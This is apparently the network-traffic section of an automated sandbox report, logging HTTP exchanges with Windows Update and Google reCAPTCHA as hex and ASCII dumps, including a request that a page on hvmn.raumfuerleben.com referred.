2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 29 74 72 79 7b 6c 3d 55 2e 55 5b 66 5d 2c 6c 5b 30 5d 5b 6c 5b 31 5d 5d 28 6c 5b 32 5d 29 7d 63 61 74 63 68 28 41 29 7b 7d 7d 63 61 74 63 68 28 41 29 7b 7d 28 30 2c 76 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 41 2c 59 29 7b 55 2e 41 24 28 41 2c 74 72 75 65 2c 59 29 7d 2c 28 66 3d 28 55 2e 55 3d 5b 5d 2c 55 2e 41 28 29 29 2c 66 75 6e 63 74 69 6f 6e 28 41 29 7b 28 58 28 55 2c 28 41 3d 21 55 2e 53 2e 6c 65 6e 67 74 68 2c 5b 63 47 5d 29 29 2c 41 29 26 26 46 28 66 61 6c 73 65 2c 74 72 75 65 2c 55 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 41 29 7b 72 65 74 75 72 6e 20 55 2e 57 4b 28 41 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 41 29 7b 72 65 74 75 72 6e 20 55 2e 42 4b 28 41 29 7d 29 2c 55 2e 68 2b 3d 55 2e 41 28 29 2d 66 7d 65 6c 73 65 7b 69 66 28 56 3d 3d 49 4b 29 72 Data Ascii: )try{l=U.U[f],l[0][l[1]](l[2])}catch(A){}}catch(A){}(0,v[1])(function(A,Y){U.A$(A,true,Y)},(f=(U.U=[],U.A()),function(A){(X(U,(A=!U.S.length,[cG])),A)&&F(false,true,U)}),function(A){return U.WK(A)},function(A){return U.BK(A)}),U.h+=U.A()-f}else{if(V==IK)r
2024-08-28 11:31:53 UTC	1390	IN	Data Raw: 73 2e 47 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 66 2c 6c 29 7b 72 65 74 75 72 6e 20 66 2d 6c 7d 29 2c 74 68 69 73 29 2e 6e 2c 74 68 69 73 2e 47 5b 74 68 69 73 2e 47 2e 6c 65 6e 67 74 68 3e 3e 31 5d 5d 7d 2c 56 2e 70 72 6f 74 6f 74 79 70 65 2e 53 33 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 6c 29 7b 28 74 68 69 73 2e 6e 2b 2b 2c 74 68 69 73 2e 47 29 2e 6c 65 6e 67 74 68 3c 35 30 3f 74 68 69 73 2e 47 2e 70 75 73 68 28 66 29 3a 28 6c 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 74 68 69 73 2e 6e 29 2c 6c 3c 35 30 26 26 28 74 68 69 73 2e 47 5b 6c 5d 3d 66 29 29 7d 2c 6e 65 77 20 56 29 2c 6e 65 77 20 56 29 2c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 76 3d 28 66 3d 55 2e 6b 54 28 29 2e 63 6f 6e 63 61 74 28 76 2e Data Ascii: s.G.sort(function(f,l){return f-l}),this).n,this.G[this.G.length>>1]]},V.prototype.S3=function(f,l){(this.n++,this.G).length<50?this.G.push(f):(l=Math.floor(Math.random()*this.n),l<50&&(this.G[l]=f))},new V),new V),function(f){return v=(f=U.kT().concat(v.

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:54 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=WLmPEdGXKfswU18&MD=Elb1RbNs HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-08-28 11:31:54 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: f7a7f022-863c-4241-aa49-b88c910904da MS-RequestId: 56f759c1-cfbd-4a23-a3d1-e433539aa98b MS-CV: R5Gh8VX9V0OSBe0L.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 28 Aug 2024 11:31:53 GMT Connection: close Content-Length: 24490
2024-08-28 11:31:54 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-08-28 11:31:54 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:56 UTC	495	OUT	GET /recaptcha/api2/webworker.js?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:57 UTC	917	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]} Expires: Wed, 28 Aug 2024 11:31:57 GMT Date: Wed, 28 Aug 2024 11:31:57 GMT Cache-Control: private, max-age=300 Cross-Origin-Resource-Policy: same-site Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:31:57 UTC	108	IN	Data Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 69 37 58 30 4a 72 6e 59 57 79 39 59 5f 35 45 59 64 6f 46 4d 37 39 6b 56 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/i7X0JrnYWy9Y_5EYdoFM79kV/recaptcha__en.js');
2024-08-28 11:31:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:31:57 UTC	877	OUT	GET /recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://hvmn.raumfuerleben.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:31:58 UTC	891	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Embedder-Policy: require-corp Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]} Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 28 Aug 2024 11:31:57 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-M5ifSRFX24A4CLQntbxe7A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:31:58 UTC	499	IN	Data Raw: 31 64 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 Data Ascii: 1d1f<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face
2024-08-28 11:31:58 UTC	1390	IN	Data Raw: 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 35 6d 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 35 46 2c 20 55 2b 30 34 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 Data Ascii: -FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2'); unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-0
2024-08-28 11:31:58 UTC	1390	IN	Data Raw: 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 34 6d 78 4b 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 Data Ascii: 1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2) format('woff2')
2024-08-28 11:31:58 UTC	1390	IN	Data Raw: 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 Data Ascii: c4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/rob
2024-08-28 11:31:58 UTC	1390	IN	Data Raw: 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 Data Ascii: ) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlC
2024-08-28 11:31:58 UTC	1390	IN	Data Raw: 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 43 68 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30 30 2d 31 45 39 46 2c 20 55 2b 31 45 46 32 2d 31 45 46 46 2c 20 55 2b 32 30 32 30 2c 20 55 2b 32 30 41 30 2d 32 30 41 42 2c 20 55 2b 32 30 41 44 2d 32 30 43 30 2c 20 55 2b 32 31 31 33 2c 20 55 2b 32 43 36 30 2d 32 43 37 46 2c 20 55 2b 41 37 32 30 2d 41 37 46 46 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d Data Ascii: CnqEu92Fr1MmYUtfChc4EsA.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face { font-family: 'Roboto'; font-
2024-08-28 11:31:58 UTC	14	IN	Data Raw: 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: body></html>
2024-08-28 11:31:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:32:10 UTC	863	OUT	POST /recaptcha/api2/reload?k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 9372 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-protobuffer Accept: / Origin: https://www.google.com X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=i7X0JrnYWy9Y_5EYdoFM79kV&k=6LduUDAqAAAAAAkMYVpyEZmE78bW2HDvbqPEVRHh Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-28 11:32:10 UTC	9372	OUT	Data Raw: 0a 18 69 37 58 30 4a 72 6e 59 57 79 39 59 5f 35 45 59 64 6f 46 4d 37 39 6b 56 12 ce 0f 30 33 41 46 63 57 65 41 34 5a 74 35 52 4c 55 73 31 48 67 54 50 70 52 59 32 51 4e 76 69 77 30 79 2d 45 55 73 45 37 6d 6e 44 53 53 33 53 6f 4c 57 57 35 30 4e 75 32 4a 6e 6a 4e 4f 53 4d 51 70 66 53 74 79 75 66 71 55 6a 53 38 5a 55 7a 6f 6b 77 62 54 4f 65 33 76 6f 6c 58 56 43 47 4c 5f 6b 4f 37 35 56 69 33 58 6a 65 34 35 56 50 65 2d 75 2d 76 5f 34 71 41 6a 4e 44 79 6f 68 6c 67 32 70 70 57 38 32 65 34 67 6d 46 31 71 45 53 75 6e 31 4e 6c 69 43 37 76 46 6a 42 4e 71 76 74 70 52 53 57 62 51 68 70 4f 45 62 6a 61 68 66 4c 41 4c 72 5a 73 4a 61 58 4f 78 46 61 2d 2d 58 6b 34 31 48 77 39 49 33 35 30 70 48 79 35 71 51 51 38 66 6c 34 73 76 53 56 39 66 6b 65 51 41 5f 75 31 4e 34 47 6f 51 Data Ascii: i7X0JrnYWy9Y_5EYdoFM79kV03AFcWeA4Zt5RLUs1HgTPpRY2QNviw0y-EUsE7mnDSS3SoLWW50Nu2JnjNOSMQpfStyufqUjS8ZUzokwbTOe3volXVCGL_kO75Vi3Xje45VPe-u-v_4qAjNDyohlg2ppW82e4gmF1qESun1NliC7vFjBNqvtpRSWbQhpOEbjahfLALrZsJaXOxFa--Xk41Hw9I350pHy5qQQ8fl4svSV9fkeQA_u1N4GoQ
2024-08-28 11:32:10 UTC	702	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 X-Content-Type-Options: nosniff Date: Wed, 28 Aug 2024 11:32:10 GMT Expires: Wed, 28 Aug 2024 11:32:10 GMT Cache-Control: private, max-age=0 X-Frame-Options: SAMEORIGIN Content-Security-Policy: frame-ancestors 'self' X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: _GRECAPTCHA=09AM2HMKjSGX0bVN3CtRJHxJ8hI3XQBRlbnpoHDhDzoTqAHjQSwfZJvBS127XkYbnATdMcEtM869HBhnSibNTFB7c; Expires=Mon, 24-Feb-2025 11:32:10 GMT; Path=/recaptcha; Secure; HttpOnly; Priority=HIGH; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-08-28 11:32:10 UTC	573	IN	Data Raw: 32 33 36 0d 0a 29 5d 7d 27 0a 5b 22 72 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 34 44 4f 4f 50 73 37 4c 4f 42 6c 45 72 57 44 6a 36 45 71 62 62 41 38 77 31 68 45 4f 67 55 67 48 58 31 76 76 69 45 67 5a 43 56 39 49 61 62 74 59 56 71 30 77 33 78 77 48 45 64 4e 48 69 62 5a 39 57 44 33 42 35 31 47 6a 56 6b 70 33 4e 5f 4e 51 51 74 52 67 66 76 58 55 49 67 71 44 4b 66 32 35 32 38 4a 44 4f 68 49 72 4b 4e 4d 4d 43 34 74 49 42 54 53 59 55 6a 74 4d 62 66 5a 4f 76 75 31 72 56 32 45 68 4c 70 53 32 4e 67 6d 72 53 70 49 32 69 66 46 6c 42 6b 59 7a 42 38 32 75 57 33 48 66 30 62 62 4b 53 78 37 62 63 35 6a 75 70 58 32 4e 30 73 75 38 43 45 71 54 38 4a 45 57 4d 48 41 62 6f 59 34 57 6f 5f 34 62 6f 41 73 6e 6c 57 4c 39 6c 70 32 69 4c 35 61 49 52 4f 4f 65 33 35 37 47 62 58 Data Ascii: 236)]}'["rresp","03AFcWeA54DOOPs7LOBlErWDj6EqbbA8w1hEOgUgHX1vviEgZCV9IabtYVq0w3xwHEdNHibZ9WD3B51GjVkp3N_NQQtRgfvXUIgqDKf2528JDOhIrKNMMC4tIBTSYUjtMbfZOvu1rV2EhLpS2NgmrSpI2ifFlBkYzB82uW3Hf0bbKSx7bc5jupX2N0su8CEqT8JEWMHAboY4Wo_4boAsnlWL9lp2iL5aIROOe357GbX
2024-08-28 11:32:10 UTC	1390	IN	Data Raw: 61 33 64 0d 0a 79 64 63 72 74 34 69 4a 71 74 58 58 45 44 51 63 65 33 6f 72 7a 4d 53 56 6a 52 30 34 39 5f 4a 4d 6b 6a 49 77 54 2d 67 67 54 59 39 6d 47 61 48 5a 41 63 73 49 39 54 4f 54 4c 6f 58 4d 74 47 5f 55 42 64 73 33 33 2d 73 47 6e 63 2d 6a 70 6f 6a 62 74 36 6f 65 4e 46 4f 36 49 6e 51 67 47 6a 51 6b 73 6a 43 62 4f 52 55 59 6e 6c 68 64 45 6b 39 4b 68 6c 2d 37 47 77 58 55 53 6d 4f 56 7a 56 4f 4f 47 47 37 75 4e 5a 78 4d 47 35 55 70 4b 41 38 65 6f 76 48 51 64 44 2d 4d 64 58 6d 32 7a 72 6c 4f 38 6b 61 62 48 6c 4e 43 68 6d 45 47 4d 4b 4f 75 70 38 62 33 59 31 58 49 68 58 43 6a 4a 74 6f 71 6b 4b 52 52 5f 6e 43 56 44 46 52 69 79 50 6e 43 31 37 4c 43 4f 4f 36 71 47 78 78 67 39 73 6d 2d 4e 54 56 37 70 45 6e 35 48 57 4b 42 52 70 54 41 63 66 57 43 4e 65 36 74 4a 39 Data Ascii: a3dydcrt4iJqtXXEDQce3orzMSVjR049_JMkjIwT-ggTY9mGaHZAcsI9TOTLoXMtG_UBds33-sGnc-jpojbt6oeNFO6InQgGjQksjCbORUYnlhdEk9Khl-7GwXUSmOVzVOOGG7uNZxMG5UpKA8eovHQdD-MdXm2zrlO8kabHlNChmEGMKOup8b3Y1XIhXCjJtoqkKRR_nCVDFRiyPnC17LCOO6qGxxg9sm-NTV7pEn5HWKBRpTAcfWCNe6tJ9
2024-08-28 11:32:10 UTC	1238	IN	Data Raw: 54 55 66 33 77 5f 2d 52 44 32 61 5a 35 67 54 4d 78 37 6d 5f 5f 56 30 7a 2d 57 30 6a 79 41 4f 6b 36 2d 66 6e 33 4d 64 4d 39 72 30 43 39 62 35 35 30 42 39 6f 47 6c 79 45 38 4e 72 6b 6f 69 4b 6b 6f 4e 47 45 78 6a 4e 55 46 54 38 62 6a 47 61 59 4b 4a 46 33 5a 6b 76 34 72 6e 36 2d 77 66 5f 67 51 6a 73 6b 6f 64 42 48 78 56 7a 57 49 32 71 36 35 31 50 37 48 74 37 58 78 74 75 4d 43 4b 36 74 69 52 38 36 56 55 31 65 6d 68 77 73 69 69 7a 53 32 48 31 6a 31 65 58 67 53 6f 33 42 51 61 55 5a 4d 6e 72 36 4e 6f 79 30 62 75 78 56 37 31 4b 47 41 33 31 64 34 56 6f 67 79 34 41 51 5a 4e 4f 66 6f 30 34 5a 5f 54 6e 4a 74 68 6e 46 53 43 68 68 39 31 34 6b 52 38 41 68 35 78 45 79 31 2d 4d 42 39 66 79 62 4a 42 4e 31 6c 58 77 74 4c 45 6d 59 72 53 51 33 4a 61 52 69 6a 37 30 30 4e 6a 37 Data Ascii: 